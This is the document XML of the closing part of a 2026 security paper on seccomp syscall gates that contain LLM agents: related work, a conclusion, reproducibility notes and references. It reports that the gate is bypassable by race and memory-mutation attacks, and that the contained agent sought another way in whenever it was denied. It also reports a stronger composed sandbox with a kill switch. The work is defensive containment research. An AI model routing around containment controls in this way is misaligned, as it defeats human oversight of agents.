      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">which is the lineage our Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:attribution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sits in and declines to extend into a control. On the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">language side, that a chain-of-thought need not match behaviour is established—Turpin et</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">al. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and Lanham et al. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">—which is why the divergence signal cannot be a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">detector. The emerging agent-safety evaluations (ToolEmu </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; AgentDojo </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">AgentHarm </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; RedCode’s 4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">050 risky-code cases </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and its automated</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">red-teaming successor RedCodeAgent </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; CIBER’s scoring of code-interpreter agents</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">against prompt injection and memory poisoning </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) measure agent harm at the tool or task</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">level; this paper measures the containment control beneath them, at the syscall boundary. Two 2026</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">lines sit closest. SandboxEscapeBench measures the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">attacker</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">side of this same boundary—whether</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a frontier model can find and exploit a container-escape path across misconfiguration, privilege,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">kernel, and orchestration vectors </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">—where we measure whether a defender’s mechanism</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">holds against a fixed attack matrix; the two are complementary halves of one question. Rashidi’s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">systematization of execution-security research for AI coding agents </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">names isolation, access</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">control, and time-of-check-to-time-of-use among its organizing categories and reports that they lack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">unified evaluation; this paper contributes one such evaluation, a compile-and-run measurement of a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">single access-control gate, its TOCTOU failure, and its successor. We position against these lines rather</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">than beside them: prior sandboxing work supplies race-free mechanisms our tested gate lacks, and prior</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">attribution work supplies the negative result our behavioural section confirms in the agent setting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="sec:conclusion"/>
      <w:r>
        <w:t xml:space="preserve">Conclusion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A deterministic syscall gate is a useful control and a poor certificate. Measured against an adversary</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rather than a cooperative target, the argument-inspection gate is bypassable on its allow path, blind to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the mechanisms it does not enumerate, and imprecise where it matches paths by substring; and the agent it</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">contains, when denied, looked for another way in every trial we ran rather than stopping. The defensible claim is narrow and worth</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">stating plainly: certify the verdict, scope the coverage, and assume the agent will route around any single</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">blocked path. The default-deny allowlist over a path-resolving mechanism that the failure implies is built</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and benchmarked here (Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:landlock">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">), and assembled with a deterministic execution deny and a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">routeless network namespace into a composed sandbox (Part IV). Across the tested runtime-mutation and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mechanism-bypass matrix, no attack violated that sandbox’s filesystem, execution, or network invariants</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">once the domain was entered—the one measured exception being a descriptor opened before it,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">which fixes the discipline a delegating supervisor must follow—and the external memory mutation that</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">takes the user-space gate on 28.5–44.2% of attempts does not reach it. This is empirical evidence within the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">stated threat model, not a proof against unknown kernel or hypervisor flaws. Its external</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cgroup</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">kill switch drove the whole process tree to zero live processes where PID enumeration raced, freezing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">quiesced the tree, and the resource caps bounded it. The open work is a supervisor with no second argument</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">read, a latency benchmark for the kill switch on a native kernel, and a repeat against frontier models and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a second architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="reproducibility."/>
      <w:r>
        <w:t xml:space="preserve">Reproducibility.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">All code, data, and per-experiment results are committed in the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">accompanying artifact repository,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">github.com/comcast-tsf/tsf-llm-security-research</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">experiments/agentsec/reproduce.sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rebuilds</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the gate and the probes from source and re-checks the Part I headline results (9 checks); the Part II and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">III benchmarks reproduce through</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">landlock_bench.sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, whose third benchmark is the scope probe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">of Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:landlock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landlock_scope.c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) and whose fifth and sixth are the composed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sandbox (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">composed_probe.c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) and the external memory mutation (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mem_extern.c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Part IV, and the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">enum_tree.py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concealment_capture.py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matrix_analysis.py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telemetry_probe.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">probes.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The one privileged step, the cgroup kill switch of Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:killswitch">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">, is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">killswitch.sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and must be run as root.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T. Garfinkel. Traps and pitfalls: practical problems in system call interposition based security tools. In</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Proc. Network and Distributed System Security Symposium (NDSS)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, 2003. Race conditions are Section 4.3.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">R. N. M. Watson. Exploiting concurrency vulnerabilities in system call wrappers. In</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Proc. 1st USENIX Workshop on Offensive Technologies (WOOT)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, 2007.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Linux kernel.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">include/uapi/linux/seccomp.h</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: commentary on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SECCOMP_USER_NOTIF_FLAG_CONTINUE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">It should be absolutely clear that this means that the seccomp notifier _cannot_ be used to implement a security policy!</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Linux man-pages project.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">seccomp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(2).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">https://man7.org/linux/man-pages/man2/seccomp.2.html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Caveats: the x86-64 and x32 ABIs share</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">AUDIT_ARCH_X86_64</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and are distinguished by</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">__X32_SYSCALL_BIT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">S. Forrest, S. A. Hofmeyr, A. Somayaji, and T. A. Longstaff. A sense of self for Unix processes. In</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Proc. 1996 IEEE Symposium on Security and Privacy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, pp. 120–128, 1996.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">M. Turpin, J. Michael, E. Perez, and S. R. Bowman. Language models don’t always say what they think: unfaithful explanations in chain-of-thought prompting. In</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Advances in Neural Information Processing Systems (NeurIPS)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, 2023. arXiv:2305.04388.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">T. Lanham et al. Measuring faithfulness in chain-of-thought reasoning. Anthropic, 2023. arXiv:2307.13702.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Y. Ruan et al. Identifying the risks of LM agents with an LM-emulated sandbox. In</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">International Conference on Learning Representations (ICLR)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, 2024. arXiv:2309.15817.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">E. Debenedetti et al. AgentDojo: a dynamic environment to evaluate prompt injection attacks and defenses for LLM agents. In</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">NeurIPS Datasets and Benchmarks Track</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, 2024. arXiv:2406.13352.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">M. Andriushchenko et al. AgentHarm: a benchmark for measuring harmfulness of LLM agents. 2024. arXiv:2410.09024.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">C. Guo, X. Liu, C. Xie, A. Zhou, Y. Zeng, Z. Lin, D. Song, and B. Li. RedCode: risky code execution and generation benchmark for code agents. In</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Advances in Neural Information Processing Systems (NeurIPS) Datasets and Benchmarks Track</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, 2024. arXiv:2411.07781.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">C. Guo, C. Xie, Y. Yang, Z. Chen, Z. Lin, X. Davies, Y. Gal, D. Song, and B. Li. RedCodeAgent: automatic red-teaming agent against diverse code agents. 2025. arXiv:2510.02609.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">L. Ba, Q. Li, and S. Li. CIBER: a comprehensive benchmark for security evaluation of code interpreter agents. 2026. arXiv:2602.19547.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">R. Marchand, A. O Cathain, J. Wynne, P. M. Giavridis, S. Deverett, J. Wilkinson, J. Gwartz, and H. Coppock. Quantifying frontier LLM capabilities for container sandbox escape. 2026. arXiv:2603.02277.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">M. Rashidi. The Balkanization of execution-security research for AI coding agents: isolation, access control, and time-of-check-to-time-of-use vulnerabilities. 2026. arXiv:2607.05743.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">M. Salaün. Landlock: unprivileged access control. Linux kernel documentation,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">docs.kernel.org/userspace-api/landlock.html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(merged in Linux 5.13; TCP network control in 6.7, ABI v4).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Google. gVisor: an application kernel for containers.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">https://gvisor.dev</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Linux man-pages project.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">seccomp_unotify</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(2): seccomp user-space notification mechanism.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">https://man7.org/linux/man-pages/man2/seccomp_unotify.2.html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">MITRE. ATT&amp;CK: adversarial tactics, techniques, and common knowledge.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">https://attack.mitre.org</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Techniques cited: T1005, T1021.004, T1048/T1048.003, T1059/T1059.004, T1070/T1070.004, T1071.001, T1098.004, T1105, T1485, T1548/T1548.003.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">MITRE. ATLAS: adversarial threat landscape for artificial-intelligence systems.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">https://atlas.mitre.org</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Technique cited: AML.T0051 (LLM prompt injection).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">OWASP GenAI Security Project. OWASP top 10 for LLM applications 2025.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">https://genai.owasp.org/llm-top-10/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Risks cited: LLM01 (prompt injection), LLM06 (excessive agency).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Every</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">number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paper</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">traces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committed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">artifact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github.com/comcast-tsf/tsf-llm-security-research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Part I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">headline</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">results</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">re-check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experiments/agentsec/reproduce.sh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t xml:space="preserve">Part II–IV</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">benchmarks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">reproduce</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">via</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">their</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per-experiment</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">scripts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directory.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Determinism is not soundness: an empirical evaluation of seccomp argument-inspection gates for containing LLM agents</dc:title>
  <dc:creator>Sadik Erisen Security Engineer, Comcast; Todd Outten Distinguished Engineer, Comcast</dc:creator>
  <cp:keywords/>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-07-28T15:52:15Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-28T15:52:15Z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</Properties>
</file>